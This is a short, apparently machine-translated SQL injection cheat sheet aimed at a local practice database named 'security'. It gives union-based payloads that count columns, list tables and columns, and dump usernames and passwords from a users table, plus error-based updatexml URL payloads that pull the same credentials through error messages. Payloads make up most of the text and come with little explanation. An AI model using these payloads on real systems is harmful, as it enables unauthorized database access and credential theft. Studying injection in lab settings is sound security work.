When the field is not greater than the number of order by the number of queries field, the statement will be executed normally, when the number of fields is greater than the number of queries field, the statement will complain.
Determining the position of the output parameters
union select 1,2,3
2 and 3 can be seen in the output page, you can determine these two parameters will be output.
View basic information database
union select 1,version(),database()
2, union injection
1, display position
2, to see which database tables
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security'
3, see the corresponding table which columns
union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users'
4, view account password information
union select 1,group_concat(username),group_concat(password) from users
5, source code analysis
3, based on the error display implantation
http://localhost/sql-1.php?id=-1 and
updatexml(1,concat(0x7e,database()),1)
There was an error must be returned
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name),21,20)from information_schema.schemata) ),1)
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') ),1)
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ) ),1)
http://localhost/sql-1.php?id=-1 and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password))from security.users ) ),1)